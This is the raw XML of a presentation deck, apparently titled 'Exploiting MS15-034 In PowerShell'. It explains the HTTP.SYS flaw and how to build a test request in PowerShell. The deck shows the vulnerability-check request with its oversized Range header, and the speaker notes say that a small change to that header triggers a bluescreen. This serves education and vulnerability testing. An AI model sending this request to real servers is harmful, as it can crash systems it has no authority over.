              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are two things that make working with TCP connections in PowerShell wonderfully simple. The first is the fact that HTTP is a text based protocol. Meaning that we will send some strings as a request, and the server responds back in kind. The other thing that makes the whole thing easy is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> framework. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> framework will take care of almost everything at the TCP layer, leaving us with just the HTTP protocol to worry about. All we need to do is make an appropriate HTTP request, and the server should respond with what we want. So what does that request look like?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122909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 this is an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> average HTTP request,  however it has been modified to exploit the MS15034 vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The request starts with our METHOD, in this case, we want to get the document root as you can see. We are also specifying that we will be using the HTTP 1.1 protocol. Then we have the HOST header, this is mandatory in HTTP 1.1 and lets a server know which website we actually want to browse. Next up is the pesky RANGE header. Notice that massive value? That is a widely accepted value for testing if a server is actually vulnerable. Changing the start of the range to 18 triggers the bluescreen. Finally, I am specifying the optional header CONNECTION and specifying CLOSE. Normally a server will keep the TCP connection with the client open after serving a request, however in this case, I am happy for the connection to be closed, and have said so via this header value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Each header element needs to be separated by a carriage return and a new line, and we need to finish the request with empty line as well. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{70A6687C-38B8-4728-A140-6965C05A07D5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3907217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01E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="708378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01E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3549424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1E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1968717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1E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="461983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1E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="867387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1E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2506742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1E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2625357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1E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2699568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1E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3079215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1E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3859884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1E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1876510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1E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378763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01E3F89-7334-4DDD-8E66-5EE6AB685466}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1840117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01E3F89-7334-4DDD-8E66-5EE6AB685466}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301837819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1E3F89-7334-4DDD-8E66-5EE6AB685466}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2978125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01E3F89-7334-4DDD-8E66-5EE6AB685466}"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FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131021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6399212" y="5883275"/>
            <a:ext cx="914400" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A01E3F89-7334-4DDD-8E66-5EE6AB685466}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/17/2016</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E0FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1705684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A01E3F89-7334-4DDD-8E66-5EE6AB685466}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/17/2016</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E0FD3A02-0156-4C05-ABD7-79C4B56E9E41}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2669531703"/>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shsecurity.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technet.microsoft.com/en-us/library/security/ms15-034.aspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://github.com/PoshSecurity/MS15034"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Exploiting MS15-034 In PowerShell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Kieran Jacobsen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Technical Lead - Readify</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>kjacobsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> – poshsecurity.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2835651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0"/>
            <a:ext cx="8676222" cy="5558443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>GET / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTTP/1.1`r`n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>google.com`r`n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Range: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>bytes=0-18446744073709551615`r`n</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Connection: Close `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>r`n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>r`n</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2738320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0"/>
            <a:ext cx="8676222" cy="5558443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Streams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1344706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0"/>
            <a:ext cx="8676222" cy="5558443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Working with TCP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3264143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0"/>
            <a:ext cx="8676222" cy="5558443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS15034.psm1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2592610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More Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>My Website – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://poshsecurity.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Twitter - @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>kjacobsen</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>MS15-034 Module – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://github.com/PoshSecurity/MS15034</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Microsoft Security Bulletin - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>technet.microsoft.com/en-us/library/security/ms15-034.aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1630227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0"/>
            <a:ext cx="8676222" cy="5558443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>‘Remote Code Execution’ -in HTTP.SYS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3822964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0"/>
            <a:ext cx="8676222" cy="5558443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>If the bad guy can execute code on your box, it isn’t your box anymore.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1105541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0"/>
            <a:ext cx="8676222" cy="5558443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>HTTP.SYS is everywhere</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2271904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0"/>
            <a:ext cx="8676222" cy="5558443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>IIS Kernel Caching module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2247243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3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3325704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0"/>
            <a:ext cx="8676222" cy="5558443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Are we vulnerable?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3567764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0"/>
            <a:ext cx="8676222" cy="5558443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Request -&gt; Response</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3933968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0"/>
            <a:ext cx="8676222" cy="5558443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>GET / HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Host: google.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Range: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>bytes=0-18446744073709551615</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Connection: Close</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18418515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A9E023"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="1FCDB6"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="5F99C9"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="AE65D1"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="D06423"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="DCAB11"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="ADE133"/>
